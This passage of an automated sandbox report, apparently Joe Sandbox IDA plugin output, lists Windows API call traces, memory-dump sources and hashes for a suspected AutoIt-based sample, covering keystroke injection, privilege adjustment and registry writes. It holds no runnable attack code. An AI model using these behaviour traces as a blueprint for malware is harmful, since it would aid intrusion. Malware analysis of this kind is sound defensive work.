                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                      • String ID:
                                                                      • API String ID: 1396898556-0
                                                                      • Opcode ID: df7eefcfbf49adb3ab47227c3efb065beb16a0c3ac75cbc18d5b97736bd5be15
                                                                      • Instruction ID: 6072857d03a97897241a6fad9fdf8c9fa3c348aa31ac161e4bfd5996eccabd64
                                                                      • Opcode Fuzzy Hash: df7eefcfbf49adb3ab47227c3efb065beb16a0c3ac75cbc18d5b97736bd5be15
                                                                      • Instruction Fuzzy Hash: FF11C131600206ABEF10AF70C81AFEE7FA9BF84710F108829F541E7181EA719E419F61
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 4e75b6efc16617a7334f1d37371a1dd3f37ba7e7e422deef003cf3990c603795
                                                                      • Instruction ID: ab920c86cbfc6a75f86a4bbffb07e5353a0e5829f9f48796cbc7d27ad12f2159
                                                                      • Opcode Fuzzy Hash: 4e75b6efc16617a7334f1d37371a1dd3f37ba7e7e422deef003cf3990c603795
                                                                      • Instruction Fuzzy Hash: 382144B0608302DFDB15DF24C454A5ABFE5BF88314F05886CF88A87762D731E849CB92
                                                                      APIs
                                                                      • __lock_file.LIBCMT ref: 005348A6
                                                                        • Part of subcall function 00538B28: __getptd_noexit.LIBCMT ref: 00538B28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd_noexit__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2597487223-0
                                                                      • Opcode ID: 4177a3aec3d14dd29133de164b09cede5dff787974838f511bc3954396e7328c
                                                                      • Instruction ID: e9dc09a4f3eb7311b760de862520e867fdd5994f961c7e4c566efedd08dece00
                                                                      • Opcode Fuzzy Hash: 4177a3aec3d14dd29133de164b09cede5dff787974838f511bc3954396e7328c
                                                                      • Instruction Fuzzy Hash: AFF0C23290170AEBDF15AFB48C0A7AEBFA0FF41325F158418F4249A191CB789951DF51
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,005D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00514E7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 9e820868afc01607b2790cc049d2c2249735ae7b3d436336a4c34ecfd178ff80
                                                                      • Instruction ID: 9f0f27974ffea6ff6b3b6fdae2fb09e051928c916d9dce609dcd658861f98462
                                                                      • Opcode Fuzzy Hash: 9e820868afc01607b2790cc049d2c2249735ae7b3d436336a4c34ecfd178ff80
                                                                      • Instruction Fuzzy Hash: 1CF03075501711CFDB349F64E494853BFE9BF543253109E3EE1D682610C7319884DF81
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005307B0
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_memmove
                                                                      • String ID:
                                                                      • API String ID: 2514874351-0
                                                                      • Opcode ID: 43ff5de6eb230ec54ef936c9b4522dc6879e4dcdf462be9fd591033819b4c957
                                                                      • Instruction ID: 7562f34e97958925888d3673f28d1762a7fe3cb32891e5aa2acf50b62412ab99
                                                                      • Opcode Fuzzy Hash: 43ff5de6eb230ec54ef936c9b4522dc6879e4dcdf462be9fd591033819b4c957
                                                                      • Instruction Fuzzy Hash: BFE0863690412957C72096589C09FEA77ADEBC86A0F0541B6FC08D7205DA609C808690
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __wfsopen
                                                                      • String ID:
                                                                      • API String ID: 197181222-0
                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction ID: 71e43971b835480f873ce1168d8116b2c431a8f7a709ba9e3ddd60887b7668ac
                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                      • Instruction Fuzzy Hash: 48B0927A44020C77CE012A92EC02A4A3F19AB81764F408020FB0C18162A673E6649A89
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 01036279
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: d46754f7fd6492f220e074453a597a96a13ae17ccbc7899d9792760481f63250
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: 4AE0BF7494020DEFDB00DFA4D5496DD7BB4EF44301F1005A1FD05D7680DB319E648A62
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 01036279
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: c3a7db1245afc7d1f8fab528af550e68daf2e6f81fd062b44629163f638e2ce9
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: DCE0BF7494020DAFDB00DFA4D54969D7BB4EF44301F100161FD0592280D6319A608A62
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0059CB37
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059CB95
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0059CBD6
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059CC00
                                                                      • SendMessageW.USER32 ref: 0059CC29
                                                                      • _wcsncpy.LIBCMT ref: 0059CC95
                                                                      • GetKeyState.USER32(00000011), ref: 0059CCB6
                                                                      • GetKeyState.USER32(00000009), ref: 0059CCC3
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0059CCD9
                                                                      • GetKeyState.USER32(00000010), ref: 0059CCE3
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0059CD0C
                                                                      • SendMessageW.USER32 ref: 0059CD33
                                                                      • SendMessageW.USER32(?,00001030,?,0059B348), ref: 0059CE37
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0059CE4D
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0059CE60
                                                                      • SetCapture.USER32(?), ref: 0059CE69
                                                                      • ClientToScreen.USER32(?,?), ref: 0059CECE
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0059CEDB
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0059CEF5
                                                                      • ReleaseCapture.USER32 ref: 0059CF00
                                                                      • GetCursorPos.USER32(?), ref: 0059CF3A
                                                                      • ScreenToClient.USER32(?,?), ref: 0059CF47
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059CFA3
                                                                      • SendMessageW.USER32 ref: 0059CFD1
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D00E
                                                                      • SendMessageW.USER32 ref: 0059D03D
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0059D05E
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0059D06D
                                                                      • GetCursorPos.USER32(?), ref: 0059D08D
                                                                      • ScreenToClient.USER32(?,?), ref: 0059D09A
                                                                      • GetParent.USER32(?), ref: 0059D0BA
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0059D123
                                                                      • SendMessageW.USER32 ref: 0059D154
                                                                      • ClientToScreen.USER32(?,?), ref: 0059D1B2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0059D1E2
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0059D20C
                                                                      • SendMessageW.USER32 ref: 0059D22F
                                                                      • ClientToScreen.USER32(?,?), ref: 0059D281
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0059D2B5
                                                                        • Part of subcall function 005125DB: GetWindowLongW.USER32(?,000000EB), ref: 005125EC
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0059D351
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                      • String ID: @GUI_DRAGID$F$pb]
                                                                      • API String ID: 3977979337-397530752
                                                                      • Opcode ID: 7e31f5eba089a5b152f07df6a361bafa1ba0c0fd1a40d938f1c2fd0675d19296
                                                                      • Instruction ID: a7a2c82ffb141a9e19dd5453dfccc50739e982ad8e58e44f8553e9cb783ca902
                                                                      • Opcode Fuzzy Hash: 7e31f5eba089a5b152f07df6a361bafa1ba0c0fd1a40d938f1c2fd0675d19296
                                                                      • Instruction Fuzzy Hash: 2C429B74204341AFDB20CF28C888AAABFE6FF59350F54091AF596C72B1D731D854EB92
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_memset
                                                                      • String ID: ]\$3cR$DEFINE$P\\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_R
                                                                      • API String ID: 1357608183-71221989
                                                                      • Opcode ID: 2fd34239c9bed3b0c4d008ba6ebaad287cc2d72f4dd288a1640938efc266588d
                                                                      • Instruction ID: d7d1c05c21fa54706e95cf4cc41802ae2b7bc91fc57971f230532d573b79d64a
                                                                      • Opcode Fuzzy Hash: 2fd34239c9bed3b0c4d008ba6ebaad287cc2d72f4dd288a1640938efc266588d
                                                                      • Instruction Fuzzy Hash: 9893B275E00619DFDB24CF98D881BADBBB1FF49310F24856AE945AB381E7709E81CB50
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 005148DF
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0054D665
                                                                      • IsIconic.USER32(?), ref: 0054D66E
                                                                      • ShowWindow.USER32(?,00000009), ref: 0054D67B
                                                                      • SetForegroundWindow.USER32(?), ref: 0054D685
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0054D69B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0054D6A2
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0054D6AE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0054D6BF
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0054D6C7
                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0054D6CF
                                                                      • SetForegroundWindow.USER32(?), ref: 0054D6D2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0054D6E7
                                                                      • keybd_event.USER32(00000012,00000000), ref: 0054D6F2
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0054D6FC
                                                                      • keybd_event.USER32(00000012,00000000), ref: 0054D701
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0054D70A
                                                                      • keybd_event.USER32(00000012,00000000), ref: 0054D70F
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0054D719
                                                                      • keybd_event.USER32(00000012,00000000), ref: 0054D71E
                                                                      • SetForegroundWindow.USER32(?), ref: 0054D721
                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0054D748
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 772dfabaea2213ead048f4c3bb980e9c6f0a012eab9110059ada8980637c2706
                                                                      • Instruction ID: aeecd372950e5be805896de7ff0af5bae0ab3964fda8e08b2f4ec99eb706290b
                                                                      • Opcode Fuzzy Hash: 772dfabaea2213ead048f4c3bb980e9c6f0a012eab9110059ada8980637c2706
                                                                      • Instruction Fuzzy Hash: 2F315371A40318BBEB206BA19C49FBF7E6CEB54B50F124026FA05EA1D1C6B05951BBB1
                                                                      APIs
                                                                        • Part of subcall function 005687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0056882B
                                                                        • Part of subcall function 005687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00568858
                                                                        • Part of subcall function 005687E1: GetLastError.KERNEL32 ref: 00568865
                                                                      • _memset.LIBCMT ref: 00568353
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005683A5
                                                                      • CloseHandle.KERNEL32(?), ref: 005683B6
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005683CD
                                                                      • GetProcessWindowStation.USER32 ref: 005683E6
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 005683F0
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0056840A
                                                                        • Part of subcall function 005681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568309), ref: 005681E0
                                                                        • Part of subcall function 005681CB: CloseHandle.KERNEL32(?,?,00568309), ref: 005681F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 2063423040-1027155976
                                                                      • Opcode ID: e6c72577016fabf9902b4b5bebab2c544fb3ce37419339e97c83f65b5549577d
                                                                      • Instruction ID: 984b4821f26a2224111dede81ccd48c45b123e6edc591026c60aac391aef9926
                                                                      • Opcode Fuzzy Hash: e6c72577016fabf9902b4b5bebab2c544fb3ce37419339e97c83f65b5549577d
                                                                      • Instruction Fuzzy Hash: F8813671900209BFDF119FA4DC49ABEBFB9FF18304F14426AF915A7261DB318A19DB60
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0057C78D
                                                                      • FindClose.KERNEL32(00000000), ref: 0057C7E1
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057C806
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0057C81D
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0057C844
                                                                      • __swprintf.LIBCMT ref: 0057C890
                                                                      • __swprintf.LIBCMT ref: 0057C8D3
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • __swprintf.LIBCMT ref: 0057C927
                                                                        • Part of subcall function 00533698: __woutput_l.LIBCMT ref: 005336F1
                                                                      • __swprintf.LIBCMT ref: 0057C975
                                                                        • Part of subcall function 00533698: __flsbuf.LIBCMT ref: 00533713
                                                                        • Part of subcall function 00533698: __flsbuf.LIBCMT ref: 0053372B
                                                                      • __swprintf.LIBCMT ref: 0057C9C4
                                                                      • __swprintf.LIBCMT ref: 0057CA13
                                                                      • __swprintf.LIBCMT ref: 0057CA62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                      • API String ID: 3953360268-2428617273
                                                                      • Opcode ID: 33665aa2aac5bf86728b361c097462f7ca59d003f5f070389c113b16204f00dc
                                                                      • Instruction ID: cf74cb6a68a87f78a0f3da6505821aafad3a880c0c91084b2482b72a3525d523
                                                                      • Opcode Fuzzy Hash: 33665aa2aac5bf86728b361c097462f7ca59d003f5f070389c113b16204f00dc
                                                                      • Instruction Fuzzy Hash: D6A10CB1408205ABD710EFA4D89ADEFBBECBFD9704F40491DF595C6191EA30DA48CB62
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0057EFB6
                                                                      • _wcscmp.LIBCMT ref: 0057EFCB
                                                                      • _wcscmp.LIBCMT ref: 0057EFE2
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0057EFF4
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0057F00E
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0057F026
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F031
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F04D
                                                                      • _wcscmp.LIBCMT ref: 0057F074
                                                                      • _wcscmp.LIBCMT ref: 0057F08B
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F09D
                                                                      • SetCurrentDirectoryW.KERNEL32(005C8920), ref: 0057F0BB
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F0C5
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F0D2
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F0E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1803514871-438819550
                                                                      • Opcode ID: fafe2a8597b8897d75ee6ad4ebfbdc6d764dec7c3fc1ac3cde43d8d60cc591c4
                                                                      • Instruction ID: f3d6a9065298599250e42c7b1527aac6042a148531b053a17e28e770fd2aff39
                                                                      • Opcode Fuzzy Hash: fafe2a8597b8897d75ee6ad4ebfbdc6d764dec7c3fc1ac3cde43d8d60cc591c4
                                                                      • Instruction Fuzzy Hash: A931C1365012196BCF14DBB4EC4DBEE7BACBF48360F148176E809D2191DB70DA44EB61
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590953
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0059F910,00000000,?,00000000,?,?), ref: 005909C1
                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00590A09
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00590A92
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00590DB2
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00590DBF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 536824911-966354055
                                                                      • Opcode ID: 14fda3662bff394c9eb512c3e2950a31bb50afe0274e074adf98c31894814093
                                                                      • Instruction ID: ef9b3632c80a554ad17103cc9eb736444991ea0419c046c1c163ccf3058e99bb
